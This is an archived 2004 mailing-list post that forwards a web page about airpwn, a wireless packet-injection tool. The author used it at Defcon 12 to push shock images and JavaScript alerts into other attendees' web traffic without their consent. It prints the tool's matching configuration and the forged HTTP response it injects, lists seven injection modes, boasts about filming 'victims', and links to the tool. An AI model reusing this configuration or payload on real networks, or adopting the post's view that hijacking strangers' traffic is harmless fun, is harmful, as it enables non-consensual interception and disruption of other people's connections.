If I was not a nice person............
Look out coffee shops..............
http://www.evilscheme.org/defcon/
-- HTML Attachment decoded to text by Ecartis --
-- File: www.evilscheme.org/defcon/
Goatse at Defcon -- brought to you by airpwn
airpwn - bringing goatse (and friends) to Defcon 12! Images from Dave's
camera[1]
Movies from Dave's camera[2]
Images from my phone[3]
At Defcon 12 this year my cow-orkers and I brought along a little piece of
code called "airpwn." Airpwn is a platform for injection of application
layerdata on an 802.11b network. Although the potential for evil is very
highwith this tool, we decided to demonstrate it (and give it its first real
field trial) on something nasty, but harmless (compared to say, wiping your
hard-drive)
Over the course of defcon, we fielded 7 different airpwn configurations to
see how well it worked, and of course to watch as 31337 h4x0rz got goatse up
in their mug. The configurations were:
* HTTP goatse, 100% of the screen
* HTTP goatse replacing all images
* HTTP goatse as the page background via CSS
* HTTP tubgirl replacing all images
* HTTP "owned" graphic, replacing all images (eventually I felt bad
aboutall the ass pictures)
* HTTP javascript alert boxes, letting people know just how pwned they
were
* FTP banners (while this worked, nobody pays attention to FTP banners
sowe abandoned this quickly)
How does it work?
airpwn requires two 802.11b interfaces, one for listening, and another for
injecting. It uses a config file with multiple config sections to respond to
specific data packets with arbitrary content. For example, in the HTML
goatseexample, we look for any TCP data packets starting with "GET" or
"POST"and respond with a valid server response including a reference to the
canonical goatse image. Here's the configuration file used for this mode:
begin goatse_html match ^(GET|POST) ignore ^GET [^
?]+\.(jpg|jpeg|gif|png|tif|tiff) response content/goatse_html and here is
thecontent that we return when the match is triggered: HTTP/1.1 200 OK
Connection: close Content-Type: text/html
<html><head><title>pwned</title></head><body><h1>OPEN YOUR MIND -- TO THE
ANUS!!</h1><img src='http://goat.cx/hello.jpg' width='100%' height='100%'>
Each of the 7 modes mentioned previously varied in the configuration and
content returned. In each case the poor user of the web browser was left
feeling disgusted, afraid and/or confused. While I was busy operating airpwn
at the laptop, my accomplices wandered the show-floor taking pictures and
theoccasional video of our victims. Links to our victims are at the top of
the page.
In all honesty, the reaction to airpwn wasn't exactly what I had expected.
When I was writing the code, I imagined that the second I turned airpwn on
we'd hear immediate groans of disgust radiating out at the speed of light.
Inpractice, airpwn's effect was simultaneously more private, and more full
ofpersonal drama. First off, the full-screen goatse seemed to be too
powerful. The second it flashed on the screen, the savvy user would have the
browser closed already. This made it incredibly difficult to actually catch
the victims on film. Based on the logs generated by airpwn we would be
hitting multiple people per second, but finding someone with goatse up on
their screen was still a bit of a challenege.. Once we did find a victim,
theresults were pretty hillarious.. I had tears rolling down my cheeks on
multiple occasions. The typical goatse reaction went something like this:
* Open browser, see goatse, jump backwards a little
* quickly close browser, take a breath
* open browser, see goatse, close browser (faster this time)
* scratch head, quit browser process, re-launch browser
* see page indicating that goatse will load soon (page header, etc.)
immediately close browser.
* open up browser preferences, click all the tabs, look for the "no
goatse" checkbox
* clear the browser cache
* open browser, see goatse, close browser
* open network preferences, click on all the tabs, look for the "no
goatse" checkbox.
* disconnect from network, re-associate
* open browser, see goatse, close browser
At this point, the less l33t people would generally give up and either 1) do
something else or 2) look deep into goatse's anus with a 10-yard stare[4]..
The more l33t victims would launch ethereal and try to figure out what was
going on.. Eventually they would mumble something about "rogue APs" (WRONG!)
or ARP poisoning (WRONG!) or DNS poisoning (WRONG!) and do something else..
After a few hours, it quickly became apparent that the image replacement
modewas the only mode that would sustainable for long periods of time. The
full-screen goatse amounted to a complete DoS of HTTP, which was just plain
rude. The javascript injection (with dialog boxes talking about the victim
being pwned) was by far the most distruptive. Most people (quite sanely)
immediately turned off their laptops or whipped out ethereal in full
COUNTERHACK mode. The goatse image mode was disruptive enough to be fully
fucking hillarious, yet still left HTTP enough alone to be usable. I guess
image-maps were the only things we truly broke with that mode (hint: click
the anus!)
Overall, airpwn was just about the only reason why defcon was amusing this
year.. Without airpwn I think I would have been mostly asleep and would have
just IRCed the entire time.. If you want to play with airpwn yourself, an
early alpha has been posted to sourceforge[5]..
-toast
--- Links ---
1 dave_images
2 dave_video
3 bryan_phoneimages
4 dave_video/What do I do now.AVI
5 http://sf.net/projects/airpwn
---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
Received on Fri Aug 6 23:34:26 2004
This archive was generated by hypermail 2.1.8 : Fri Aug 06 2004 - 23:34:28 AKDT
